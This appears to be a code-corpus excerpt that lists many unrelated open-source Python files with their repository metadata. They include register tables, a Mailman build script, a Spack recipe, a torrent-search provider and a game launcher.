'SREG_T': '$40',
'SREG_H': '$20',
'SREG_S': '$10',
'SREG_V': '$08',
'SREG_N': '$04',
'SREG_Z': '$02',
'SREG_C': '$01',
'SP': '&93',
'OSCCAL': '&102',
'CLKPR': '&97',
'CLKPR_CLKPCE': '$80',
'CLKPR_CLKPS': '$0F',
'SMCR': '&83',
'SMCR_SM': '$0E',
'SMCR_SE': '$01',
'GPIOR2': '&75',
'GPIOR2_GPIOR': '$FF',
'GPIOR1': '&74',
'GPIOR1_GPIOR': '$FF',
'GPIOR0': '&62',
'GPIOR0_GPIOR07': '$80',
'GPIOR0_GPIOR06': '$40',
'GPIOR0_GPIOR05': '$20',
'GPIOR0_GPIOR04': '$10',
'GPIOR0_GPIOR03': '$08',
'GPIOR0_GPIOR02': '$04',
'GPIOR0_GPIOR01': '$02',
'GPIOR0_GPIOR00': '$01',
'PRR0': '&100',
'PRR0_PRTWI': '$80',
'PRR0_PRTIM2': '$40',
    'PRR0_PRTIM0': '$20',
'PRR0_PRUSART': '$12',
    'PRR0_PRTIM1': '$08',
'PRR0_PRSPI': '$04',
'PRR0_PRADC': '$01',
'INT0Addr': '2',
'INT1Addr': '4',
'INT2Addr': '6',
'PCINT0Addr': '8',
'PCINT1Addr': '10',
'PCINT2Addr': '12',
'PCINT3Addr': '14',
'WDTAddr': '16',
'TIMER2_COMPAAddr': '18',
'TIMER2_COMPBAddr': '20',
'TIMER2_OVFAddr': '22',
'TIMER1_CAPTAddr': '24',
'TIMER1_COMPAAddr': '26',
'TIMER1_COMPBAddr': '28',
'TIMER1_OVFAddr': '30',
'TIMER0_COMPAAddr': '32',
'TIMER0_COMPBAddr': '34',
'TIMER0_OVFAddr': '36',
'SPI__STCAddr': '38',
'USART0__RXAddr': '40',
'USART0__UDREAddr': '42',
'USART0__TXAddr': '44',
'ANALOG_COMPAddr': '46',
'ADCAddr': '48',
'EE_READYAddr': '50',
'TWIAddr': '52',
'SPM_READYAddr': '54',
'USART1_RXAddr': '56',
'USART1_UDREAddr': '58',
'USART1_TXAddr': '60'
}
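# Illustrative helper (not from the generated file): the values above appear
# to use Forth-style literals ('&' decimal, '$' hexadecimal) as in AmForth
# sources; that reading is an assumption, not stated in this file.
def _reg_value(name):
    raw = MCUREGS[name]
    if raw.startswith('&'):
        return int(raw[1:], 10)   # e.g. _reg_value('PORTA') -> 34
    if raw.startswith('$'):
        return int(raw[1:], 16)   # e.g. _reg_value('SREG_I') -> 0x80
    return int(raw)               # interrupt vector offsets like 'INT0Addr'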
|
fake-name/ReadableWebProxy
|
WebMirror/management/rss_parser_funcs/feed_parse_extractWhatzombiesfearCom.py
|
Python
|
bsd-3-clause
| 551 | 0.034483 |
def extractWhatzombiesfearCom(item):
'''
Parser for 'whatzombiesfear.com'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return None
tagmap = [
('PRC', 'PRC', 'translated'),
('Loiterous', 'Loiterous', 'oel'),
]
for tagname, name, tl_type in tagmap:
if tagname in item['tags']:
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False
|
MicrosoftGenomics/FaST-LMM
|
tests/inputs/buggy/lrt_one_kernel_mixed_effect_laplace_l2_logistic_qqfit.N30.py
|
Python
|
apache-2.0
| 956 | 0.041841 |
distributable = FastLmmSet(
phenofile = 'datasets/phenSynthFrom22.23.bin.N30.txt',
alt_snpreader = 'datasets/all_chr.maf0.001.N30',
altset_list = 'datasets/set_input.23_17_11.txt',
covarfile = None,
filenull = None,
autoselect = False,
mindist = 0,
idist=2,
nperm = 10,
test="lrt",
    nullfit="qq", #use quantile-quantile fit to estimate params of null distribution
outfile = 'tmp/lrt_one_kernel_mixed_effect_laplace_l2_logistic_qqfit.N30.txt',
forcefullrank=False,
qmax=0.1, #use the top 10% of null distrib test statistics to fit the null distribution
write_lrtperm=True,
datestamp=None,
nullModel={'effect':'mixed', 'link':'logistic',
'approx':'laplace', 'penalty':'l2'},
altModel={'effect':'mixed', 'link':'logistic',
'approx':'laplace', 'penalty':'l2'},
log = logging.CRITICAL,
detailed_table = False
)
|
uclouvain/osis
|
base/forms/entity.py
|
Python
|
agpl-3.0
| 2,540 | 0.001182 |
##############################################################################
#
# OSIS stands for Open Student Information System. It's an application
# designed to manage the core business of higher education institutions,
# such as universities, faculties, institutes and professional schools.
# The core business involves the administration of students, teachers,
# courses, programs and so on.
#
# Copyright (C) 2015-2019 Université catholique de Louvain (http://www.uclouvain.be)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# A copy of this license - GNU General Public License - is available
#    at the root of the source code of this program. If not,
# see http://www.gnu.org/licenses/.
#
##############################################################################
import django_filters
from django.forms import TextInput
from django.urls import reverse
from django.utils.translation import gettext_lazy as _
from rest_framework import serializers
from base.models.entity_version import EntityVersion
class EntityVersionFilter(django_filters.FilterSet):
acronym = django_filters.CharFilter(
lookup_expr='icontains', label=_("Acronym"),
widget=TextInput(attrs={'style': "text-transform:uppercase"})
)
title = django_filters.CharFilter(lookup_expr='icontains', label=_("Title"), )
class Meta:
model = EntityVersion
fields = ["entity_type"]
class EntityListSerializer(serializers.Serializer):
acronym = serializers.CharField()
title = serializers.CharField()
entity_type = serializers.CharField()
# Display human readable value
entity_type_text = serializers.CharField(source='get_entity_type_display', read_only=True)
organization = serializers.SerializerMethodField()
select_url = serializers.SerializerMethodField()
def get_organization(self, obj):
return str(obj.entity.organization)
def get_select_url(self, obj):
return reverse(
"entity_read",
kwargs={'entity_version_id': obj.id}
)
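# Illustrative sketch (not from the upstream module): typical wiring of the
# filter and serializer defined above; the surrounding request handling is
# assumed, only EntityVersionFilter and EntityListSerializer come from this
# file.
def _filtered_entity_payload(query_params):
    filterset = EntityVersionFilter(query_params,
                                    queryset=EntityVersion.objects.all())
    return EntityListSerializer(filterset.qs, many=True).data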
|
googleapis/python-dialogflow
|
samples/generated_samples/dialogflow_generated_dialogflow_v2_documents_delete_document_async.py
|
Python
|
apache-2.0
| 1,580 | 0.000633 |
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for DeleteDocument
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-dialogflow
# [START dialogflow_generated_dialogflow_v2_Documents_DeleteDocument_async]
from google.cloud import dialogflow_v2
async def sample_delete_document():
# Create a client
client = dialogflow_v2.DocumentsAsyncClient()
# Initialize request argument(s)
request = dialogflow_v2.DeleteDocumentRequest(
name="name_value",
)
# Make the request
operation = client.delete_document(request=request)
print("Waiting for operation to complete...")
response = await operation.result()
# Handle the response
print(response)
# [END dialogflow_generated_dialogflow_v2_Documents_DeleteDocument_async]
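# Illustrative addition (not part of the generated sample): the coroutine
# above can be driven with asyncio's standard entry point when the snippet
# is executed directly (credentials/project setup assumed).
if __name__ == "__main__":
    import asyncio
    asyncio.run(sample_delete_document())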
|
rahulbohra/Python-Basic
|
35_sum_count_avg_by_user_input.py
|
Python
|
mit
| 454 | 0.002203 |
count = 0
total = 0
average = 0
while True:
    inputNumber = raw_input('Enter a number : ')
# Edge Cases
if inputNumber == 'done':
break
if len(inputNumber) < 1:
break
# Logical work
try:
number = float(inputNumber)
except:
        print 'Invalid Number'
continue
count = count + 1
total = total + number
print 'Count Total\n', count, total
average = total / count
print average
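# Illustrative addition (not from the original script): the code above is
# Python 2 (raw_input / print statement). A compact Python 3 rendering of
# the same loop, for comparison:
def running_average_py3():
    count, total = 0, 0.0
    while True:
        entry = input('Enter a number : ')
        if entry == 'done' or len(entry) < 1:
            break
        try:
            number = float(entry)
        except ValueError:
            print('Invalid Number')
            continue
        count += 1
        total += number
        print('Count Total\n', count, total)
        print(total / count)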
|
abramhindle/UnnaturalCodeFork
|
python/testdata/launchpad/buildmailman.py
|
Python
|
agpl-3.0
| 7,591 | 0 |
#! /usr/bin/python
#
# Copyright 2009, 2010 Canonical Ltd. This software is licensed under the
# GNU Affero General Public License version 3 (see the file LICENSE).
import errno
import grp
import os
import pwd
import socket
import subprocess
import sys
import tempfile
from lazr.config import as_username_groupname
from lp.services.config import config
from lp.services.mailman.config import (
configure_prefix,
configure_siteowner,
)
from lp.services.mailman.monkeypatches import monkey_patch
basepath = [part for part in sys.path if part]
def build_mailman():
# Build and install Mailman if it is enabled and not yet built.
if not config.mailman.build:
# There's nothing to do.
return 0
mailman_path = configure_prefix(config.mailman.build_prefix)
mailman_bin = os.path.join(mailman_path, 'bin')
var_dir = os.path.abspath(config.mailman.build_var_dir)
# If we can import the package, we assume Mailman is properly built at
# the least. This does not catch re-installs that might be necessary
# should our copy in sourcecode be updated. Do that manually.
sys.path.append(mailman_path)
try:
import Mailman
except ImportError:
# sys.path_importer_cache is a mapping of elements of sys.path to
# importer objects used to handle them. In Python2.5+ when an element
# of sys.path is found to not exist on disk, a NullImporter is created
# and cached - this causes Python to never bother re-inspecting the
# disk for that path element. We must clear that cache element so that
# our second attempt to import MailMan after building it will actually
# check the disk.
del sys.path_importer_cache[mailman_path]
need_build = need_install = True
else:
need_build = need_install = False
# Also check for Launchpad-specific bits stuck into the source tree by
# monkey_patch(), in case this is half-installed. See
# <https://bugs.launchpad.net/launchpad-registry/+bug/683486>.
try:
from Mailman.Queue import XMLRPCRunner
from Mailman.Handlers import LPModerate
except ImportError:
# Monkey patches not present, redo install and patch steps.
need_install = True
# Make sure the target directories exist and have the correct
# permissions, otherwise configure will complain.
user, group = as_username_groupname(config.mailman.build_user_group)
# Now work backwards to get the uid and gid
try:
uid = pwd.getpwnam(user).pw_uid
except KeyError:
print >> sys.stderr, 'No user found:', user
sys.exit(1)
try:
gid = grp.getgrnam(group).gr_gid
except KeyError:
print >> sys.stderr, 'No group found:', group
sys.exit(1)
# Ensure that the var_dir exists, is owned by the user:group, and has
# the necessary permissions. Set the mode separately after the
# makedirs() call because some platforms ignore mkdir()'s mode (though
# I think Linux does not ignore it -- better safe than sorry).
try:
os.makedirs(var_dir)
except OSError as e:
if e.errno != errno.EEXIST:
raise
else:
        # Just created the var directory, will need to install mailman bits.
need_install = True
os.chown(var_dir, uid, gid)
os.chmod(var_dir, 02775)
# Skip mailman setup if nothing so far has shown a reinstall needed.
if not need_install:
return 0
mailman_source = os.path.join('sourcecode', 'mailman')
if config.mailman.build_host_name:
build_host_name = config.mailman.build_host_name
else:
build_host_name = socket.getfqdn()
# Build and install the Mailman software. Note that we don't care about
# --with-cgi-gid because we're not going to use that Mailman subsystem.
executable = os.path.abspath('bin/py')
configure_args = (
'./configure',
'--prefix', mailman_path,
'--with-var-prefix=' + var_dir,
'--with-python=' + executable,
'--with-username=' + user,
'--with-groupname=' + group,
'--with-mail-gid=' + group,
'--with-mailhost=' + build_host_name,
'--with-urlhost=' + build_host_name,
)
if need_build:
# Configure.
retcode = subprocess.call(configure_args, cwd=mailman_source)
if retcode:
print >> sys.stderr, 'Could not configure Mailman:'
sys.exit(retcode)
# Make.
        retcode = subprocess.call(('make',), cwd=mailman_source)
if retcode:
print >> sys.stderr, 'Could not make Mailman.'
sys.exit(retcode)
retcode = subprocess.call(('make', 'install'), cwd=mailman_source)
if retcode:
print >> sys.stderr, 'Could not install Mailman.'
sys.exit(retcode)
# Try again to import the package.
try:
import Mailman
except ImportError:
print >> sys.stderr, 'Could not import the Mailman package'
return 1
# Check to see if the site list exists. The output can go to /dev/null
# because we don't really care about it. The site list exists if
# config_list returns a zero exit status, otherwise it doesn't
# (probably). Before we can do this however, we must monkey patch
# Mailman, otherwise mm_cfg.py won't be set up correctly.
monkey_patch(mailman_path, config)
import Mailman.mm_cfg
retcode = subprocess.call(
('./config_list', '-o', '/dev/null',
Mailman.mm_cfg.MAILMAN_SITE_LIST),
cwd=mailman_bin,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if retcode:
addr, password = configure_siteowner(
config.mailman.build_site_list_owner)
# The site list does not yet exist, so create it now.
retcode = subprocess.call(
('./newlist', '--quiet',
'--emailhost=' + build_host_name,
Mailman.mm_cfg.MAILMAN_SITE_LIST,
addr, password),
cwd=mailman_bin)
if retcode:
print >> sys.stderr, 'Could not create site list'
return retcode
retcode = configure_site_list(
mailman_bin, Mailman.mm_cfg.MAILMAN_SITE_LIST)
if retcode:
print >> sys.stderr, 'Could not configure site list'
return retcode
# Create a directory to hold the gzip'd tarballs for the directories of
# deactivated lists.
try:
os.mkdir(os.path.join(Mailman.mm_cfg.VAR_PREFIX, 'backups'))
except OSError as e:
if e.errno != errno.EEXIST:
raise
return 0
def configure_site_list(mailman_bin, site_list_name):
"""Configure the site list.
Currently, the only thing we want to set is to not advertise the
site list.
"""
fd, config_file_name = tempfile.mkstemp()
try:
os.close(fd)
config_file = open(config_file_name, 'w')
try:
print >> config_file, 'advertised = False'
finally:
config_file.close()
return subprocess.call(
('./config_list', '-i', config_file_name, site_list_name),
cwd=mailman_bin)
finally:
os.remove(config_file_name)
def main():
# setting python paths
program = sys.argv[0]
src = 'lib'
here = os.path.dirname(os.path.abspath(program))
srcdir = os.path.join(here, src)
sys.path = [srcdir, here] + basepath
return build_mailman()
if __name__ == '__main__':
return_code = main()
sys.exit(return_code)
|
LLNL/spack
|
var/spack/repos/builtin/packages/r-rots/package.py
|
Python
|
lgpl-2.1
| 1,117 | 0.000895 |
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RRots(RPackage):
"""Reproducibility-Optimized Test Statistic
Calculates the Reproducibility-Optimized Test Statistic (ROTS) for
differential testing in omics data."""
homepage = "https://bioconductor.org/packages/ROTS"
git = "https://git.bioconductor.org/packages/ROTS.git"
version('1.18.0', commit='1d4e206a8ce68d5a1417ff51c26174ed9d0ba7d2')
    version('1.12.0', commit='7e2c96fd8fd36710321498745f24cc6b59ac02f0')
version('1.10.1', commit='1733d3f868cef4d81af6edfc102221d80793937b')
    version('1.8.0', commit='02e3c6455bb1afe7c4cc59ad6d4d8bae7b01428b')
version('1.6.0', commit='3567ac1142ba97770b701ee8e5f9e3e6c781bd56')
version('1.4.0', commit='2e656514a4bf5a837ee6e14ce9b28a61dab955e7')
depends_on('r@3.3:', type=('build', 'run'))
depends_on('r-rcpp', type=('build', 'run'))
depends_on('r-biobase', type=('build', 'run'))
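    # Illustrative note (not from the original recipe): typical command-line
    # use of this Spack package, e.g. installing one of the versions
    # declared above:
    #
    #     spack install r-rots@1.18.0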
|
chetan/cherokee
|
admin/market/ows_consts.py
|
Python
|
gpl-2.0
| 1,407 | 0.012082 |
# -*- coding: utf-8 -*-
#
# Cherokee-admin
#
# Authors:
# Alvaro Lopez Ortega <alvaro@alobbs.com>
#
# Copyright (C) 2001-2010 Alvaro Lopez Ortega
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of version 2 of the GNU General Public
# License as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
#  You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
#
from consts import *
from configured import *
OWS_STATIC = 'http://cherokee-market.com'
OWS_APPS = 'http://www.octality.com/api/v%s/open/market/apps/' %(OWS_API_VERSION)
OWS_APPS_AUTH = 'http://www.octality.com/api/v%s/market/apps/' %(OWS_API_VERSION)
OWS_APPS_INSTALL  = 'http://www.octality.com/api/v%s/market/install/' %(OWS_API_VERSION)
OWS_DEBUG = True
URL_MAIN = '/market'
URL_APP = '/market/app'
URL_SEARCH = '/market/search'
URL_SEARCH_APPLY = '/market/search/apply'
URL_CATEGORY = '/market/category'
URL_REVIEW = '/market/review'
|
elit3ge/SickRage
|
sickbeard/providers/kat.py
|
Python
|
gpl-3.0
| 9,861 | 0.003752 |
# coding=utf-8
# Author: Mr_Orange <mr_orange@hotmail.it>
# URL: http://code.google.com/p/sickbeard/
#
# This file is part of SickRage.
#
# SickRage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickRage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickRage. If not, see <http://www.gnu.org/licenses/>.
from __future__ import with_statement
import traceback
import re
import datetime
import xmltodict
import sickbeard
from sickbeard.providers import generic
from sickbeard.common import Quality
from sickbeard import logger
from sickbeard import tvcache
from sickbeard import helpers
from sickbeard import db
from sickbeard import classes
from sickbeard.show_name_helpers import allPossibleShowNames, sanitizeSceneName
class KATProvider(generic.TorrentProvider):
def __init__(self):
generic.TorrentProvider.__init__(self, "KickAssTorrents")
self.supportsBacklog = True
self.public = True
self.enabled = False
self.confirmed = True
self.ratio = None
self.minseed = None
self.minleech = None
self.cache = KATCache(self)
self.urls = {
'base_url': 'https://kat.cr/',
'search': 'https://kat.cr/usearch/',
'rss': 'https://kat.cr/tv/',
}
self.url = self.urls['base_url']
self.search_params = {
'q': '',
'field': 'seeders',
'sorder': 'desc',
'rss': 1,
'category': 'tv'
}
def isEnabled(self):
return self.enabled
def imageName(self):
return 'kat.png'
def _get_season_search_strings(self, ep_obj):
search_string = {'Season': []}
for show_name in set(allPossibleShowNames(ep_obj.show)):
ep_string = sanitizeSceneName(show_name) + ' '
if ep_obj.show.air_by_date or ep_obj.show.sports:
ep_string += str(ep_obj.airdate).split('-')[0]
elif ep_obj.show.anime:
ep_string += "%02d" % ep_obj.scene_absolute_number
else:
ep_string = '%s S%02d -S%02dE category:tv' % (sanitizeSceneName(show_name), ep_obj.scene_season, ep_obj.scene_season) #1) showName SXX -SXXE
search_string['Season'].append(ep_string)
ep_string = '%s "Season %d" -Ep* category:tv' % (sanitizeSceneName(show_name), ep_obj.scene_season) # 2) showName "Season X"
search_string['Season'].append(ep_string)
return [search_string]
def _get_episode_search_strings(self, ep_obj, add_string=''):
search_string = {'Episode': []}
for show_name in set(allPossibleShowNames(ep_obj.show)):
ep_string = sanitizeSceneName(show_name) + ' '
if ep_obj.show.air_by_date:
ep_string += str(ep_obj.airdate).replace('-', ' ')
elif ep_obj.show.sports:
ep_string += str(ep_obj.airdate).replace('-', ' ') + '|' + ep_obj.airdate.strftime('%b')
elif ep_obj.show.anime:
ep_string += "%02d" % ep_obj.scene_absolute_number
else:
ep_string += sickbeard.config.naming_ep_type[2] % {'seasonnumber': ep_obj.scene_season,
'episodenumber': ep_obj.scene_episode} + '|' + \
sickbeard.config.naming_ep_type[0] % {'seasonnumber': ep_obj.scene_season,
'episodenumber': ep_obj.scene_episode}
if add_string:
ep_string += ' ' + add_string
search_string['Episode'].append(re.sub(r'\s+', ' ', ep_string.strip()))
return [search_string]
def _get_size(self, item):
#pylint: disable=W0612
title, url, info_hash, seeders, leechers, size, pubdate = item
return size or -1
def _doSearch(self, search_strings, search_mode='eponly', epcount=0, age=0, epObj=None):
results = []
items = {'Season': [], 'Episode': [], 'RSS': []}
for mode in search_strings.keys():
for search_string in search_strings[mode]:
self.search_params.update({'q': search_string, 'field': ('seeders', 'time_add')[mode == 'RSS']})
logger.log(u"Search string: %s" % unicode(self.search_params), logger.DEBUG)
try:
data = self.getURL(self.urls[('search', 'rss')[mode == 'RSS']], params=self.search_params)
if not data:
continue
entries = xmltodict.parse(data)
if not all([entries, 'rss' in entries, 'channel' in entries['rss'], 'item' in entries['rss']['channel']]):
continue
                    for item in entries['rss']['channel']['item']:
try:
title = item['title']
# Use the torcache link kat provides,
# unless it is not torcache or we are not using blackhole
# because we want to use magnets if connecting direct to client
# so that proxies work.
url = item['enclosure']['@url']
if sickbeard.TORRENT_METHOD != "blackhole" or 'torcache' not in url:
url = item['torrent:magnetURI']
seeders = int(item['torrent:seeds'])
leechers = int(item['torrent:peers'])
verified = bool(int(item['torrent:verified']) or 0)
size = int(item['torrent:contentLength'])
info_hash = item['torrent:infoHash']
#link = item['link']
except (AttributeError, TypeError, KeyError):
continue
# Dont let RSS add items with no seeders either -.-
if not seeders or seeders < self.minseed or leechers < self.minleech:
logger.log(u"Discarding torrent because it doesn't meet the minimum seeders or leechers: {0} (S:{1} L:{2})".format(title, seeders, leechers), logger.DEBUG)
continue
if self.confirmed and not verified:
logger.log(u"KAT Provider found result " + title + " but that doesn't seem like a verified result so I'm ignoring it", logger.DEBUG)
continue
if not title or not url:
continue
try:
pubdate = datetime.datetime.strptime(item['pubDate'], '%a, %d %b %Y %H:%M:%S +0000')
except Exception:
pubdate = datetime.datetime.today()
item = title, url, info_hash, seeders, leechers, size, pubdate
items[mode].append(item)
except Exception:
logger.log(u"Failed to parsing " + self.name + " Traceback: " + traceback.format_exc(),
logger.WARNING)
#For each search mode sort all the items by seeders
items[mode].sort(key=lambda tup: tup[3], reverse=True)
results += items[mode]
return results
def _get_title_and_url(self, item):
#pylint: disable=W0612
title, url, info_hash, seeders, leechers, size, pubdate = item
if title:
title = self._clean_title_from_provider(title)
if url:
url = url.replace('&', '&
|
mfwarren/django-mailer-2
|
django_mailer/constants.py
|
Python
|
mit
| 475 | 0 |
PRIORITY_EMAIL_NOW = 0
PRIORITY_HIGH = 1
PRIORITY_NORMAL = 3
PRIORITY_LOW = 5
RESULT_SENT = 0
RESULT_SKIPPED = 1
RESULT_FAILED = 2
PRIORITIES = {
'now': PRIORITY_EMAIL_NOW,
    'high': PRIORITY_HIGH,
'normal': PRIORITY_NORMAL,
'low': PRIORITY_LOW,
}
PRIORITY_HEADER = 'X-Mail-Queue-Priority'
try:
from django.core.mail import get_connection
EMAIL_BACKEND_SUPPORT = True
except ImportError:
# Django version < 1.2
    EMAIL_BACKEND_SUPPORT = False
|
MjnMixael/knossos
|
knossos/launcher.py
|
Python
|
apache-2.0
| 12,595 | 0.003335 |
## Copyright 2017 Knossos authors, see NOTICE file
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
from __future__ import absolute_import, print_function
import sys
import os
import logging
import subprocess
import time
import json
import traceback
import ssl
import six
from six.moves.urllib import parse as urlparse
logging.basicConfig(level=logging.DEBUG, format='%(levelname)s:%(threadName)s:%(module)s.%(funcName)s: %(message)s')
# We have to be in the correct directory *before* we import clibs so we're going to do this as early as possible.
if hasattr(sys, 'frozen'):
if hasattr(sys, '_MEIPASS'):
os.chdir(sys._MEIPASS)
else:
os.chdir(os.path.dirname(sys.executable))
else:
my_path = os.path.dirname(__file__)
if my_path != '':
os.chdir(my_path)
from . import uhf
uhf(__name__)
from . import center
# Initialize the FileHandler early to capture all log messages.
if not os.path.isdir(center.settings_path):
os.makedirs(center.settings_path)
# We truncate the log file on every start to avoid filling the user's disk with useless data.
log_path = os.path.join(center.settings_path, 'log.txt')
try:
if os.path.isfile(log_path):
os.unlink(log_path)
except Exception:
# This will only be visible if the user is running a console version.
logging.exception('The log is in use by someone!')
else:
handler = logging.FileHandler(log_path, 'w')
handler.setFormatter(logging.Formatter('%(levelname)s:%(threadName)s:%(module)s.%(funcName)s: %(message)s'))
handler.setLevel(logging.DEBUG)
logging.getLogger().addHandler(handler)
if not center.DEBUG:
logging.getLogger().setLevel(logging.INFO)
if six.PY2:
from . import py2_compat # noqa
from .qt import QtCore, QtGui, QtWidgets, variant as qt_variant
from . import util, ipc, auto_fetch
app = None
ipc_conn = None
translate = QtCore.QCoreApplication.translate
def my_excepthook(type, value, tb):
try:
# NOTE: This can fail (for some reason) in traceback.print_exception.
logging.error('UNCAUGHT EXCEPTION!', exc_info=(type, value, tb))
except Exception:
logging.error('UNCAUGHT EXCEPTION!\n%s%s: %s' % (''.join(traceback.format_tb(tb)), type.__name__, value))
msg = translate('launcher', 'A critical error occurred! Knossos might not work correctly until you restart it.')
if center.raven:
msg += '\n' + translate('launcher', 'The error has been reported and will hopefully be fixed soon.')
msg += '\n' + translate('launcher', 'If you want to help, report this bug on our Discord channel, ' +
'in the HLP thread or on GitHub. Just click a button below to open the relevant page.')
try:
box = QtWidgets.QMessageBox(QtWidgets.QMessageBox.Critical, 'Knossos', msg, QtWidgets.QMessageBox.Ok)
discord = box.addButton('Open Discord', QtWidgets.QMessageBox.ActionRole)
hlp = box.addButton('Open HLP Thread', QtWidgets.QMessageBox.ActionRole)
github = box.addButton('Open GitHub Issues', QtWidgets.QMessageBox.ActionRole)
box.exec_()
choice = box.clickedButton()
url = None
if choice == discord:
url = 'https://discord.gg/qfReB8t'
elif choice == hlp:
url = 'https://www.hard-light.net/forums/index.php?topic=94068.0'
elif choice == github:
url = 'https://github.com/ngld/knossos/issues'
if url:
QtGui.QDesktopServices.openUrl(QtCore.QUrl(url))
except Exception:
pass
def get_cmd(args=[]):
if hasattr(sys, 'frozen'):
my_path = [os.path.abspath(sys.executable)]
else:
my_path = [os.path.abspath(sys.executable), os.path.abspath('__main__.py')]
return my_path + args
def get_file_path(name):
    if hasattr(sys, 'frozen') or os.path.isdir('data'):
return os.path.join('data', name)
else:
from pkg_resources import resource_filename
return resource_filename(__package__, name)
def load_settings():
spath = os.path.join(center.settings_path, 'settings.json')
    settings = center.settings
if os.path.exists(spath):
try:
with open(spath, 'r') as stream:
settings.update(json.load(stream))
except Exception:
logging.exception('Failed to load settings from "%s"!', spath)
# Migration
if 's_version' not in settings:
settings['s_version'] = 0
if settings['s_version'] < 6:
for name in ('mods', 'installed_mods', 'repos', 'nebula_link', 'nebula_web'):
if name in settings:
del settings[name]
settings['s_version'] = 6
else:
# Most recent settings version
settings['s_version'] = 6
if settings['hash_cache'] is not None:
util.HASH_CACHE = settings['hash_cache']
if settings['use_raven']:
util.enable_raven()
if settings['repos_override']:
center.REPOS = settings['repos_override']
if settings['api_override']:
center.API = settings['api_override']
if settings['web_override']:
center.WEB = settings['web_override']
if settings['debug_log']:
logging.getLogger().setLevel(logging.DEBUG)
util.ensure_tempdir()
return settings
def run_knossos():
global app
from .windows import HellWindow
center.app = app
center.main_win = HellWindow()
app.processEvents()
if sys.platform.startswith('win') and os.path.isfile('7z.exe'):
util.SEVEN_PATH = os.path.abspath('7z.exe')
elif sys.platform == 'darwin' and os.path.isfile('7z'):
util.SEVEN_PATH = os.path.abspath('7z')
translate = QtCore.QCoreApplication.translate
if not util.test_7z():
QtWidgets.QMessageBox.critical(None, 'Knossos', translate(
'launcher', 'I can\'t find "7z"! Please install it and run this program again.'))
return
util.DL_POOL.set_capacity(center.settings['max_downloads'])
if center.settings['download_bandwidth'] > 0.0:
util.SPEED_LIMIT_BUCKET.set_rate(center.settings['download_bandwidth'])
from . import repo, progress, integration
center.installed = repo.InstalledRepo()
center.pmaster = progress.Master()
center.pmaster.start_workers(10)
center.mods = repo.Repo()
center.auto_fetcher = auto_fetch.AutoFetcher()
# This has to run before we can load any mods!
repo.CPU_INFO = util.get_cpuinfo()
integration.init()
mod_db = os.path.join(center.settings_path, 'mods.json')
if os.path.isfile(mod_db):
try:
center.mods.load_json(mod_db)
except Exception:
logging.exception('Failed to load local mod list!')
center.mods.clear()
center.main_win.start_init()
app.exec_()
center.save_settings()
ipc.shutdown()
def handle_ipc_error():
global app, ipc_conn
logging.warning('Failed to connect to main process!')
if ipc_conn is not None:
ipc_conn.clean()
ipc_conn = None
def scheme_handler(link):
global app, ipc_conn
if not link.startswith(('fs2://', 'fso://')):
# NOTE: fs2:// is deprecated, we don't tell anyone about it.
QtWidgets.QMessageBox.critical(None, 'Knossos',
translate('launcher', 'I don\'t know how to handle "%s"! I only know fso:// .') % (link))
app.quit()
return True
link = urlparse.unquote(link.strip()).split('/')
if len(link) < 3:
QtWidgets.QMessageBox.critical(None, 'Knossos', translate('launcher', 'Not enough arguments!'))
app.quit()
return True
if not ipc_co
|
Fatman13/gta_swarm
|
ctripmultiplus.py
|
Python
|
mit
| 1,017 | 0.013766 |
#!/usr/bin/env python
# coding=utf-8
import pprint
import csv
import click
import requests
import datetime as datetime
from datetime import date
from xml.etree import ElementTree as ET
import os
# from random import sample
import random
import json
# import logging
import subprocess
import glob
import time
@click.command()
@click.option('--days', default=10, type=int)
@click.option('--span', default=5, type=int)
# @click.option('--duration', default=3, type=int)
# @click.option('--days', default=1, type=int)
def ctripmultiplus(days, span):
start_days = days
for i in range(span):
subprocess.call(['python', 'ctripplus.py', '--days', str(start_days + i*10)])
for i in range(3):
print('sleeping..')
time.sleep(1)
# newest = max(glob.iglob('output_Search_item_hr_*.csv'), key=os.path.getctime)
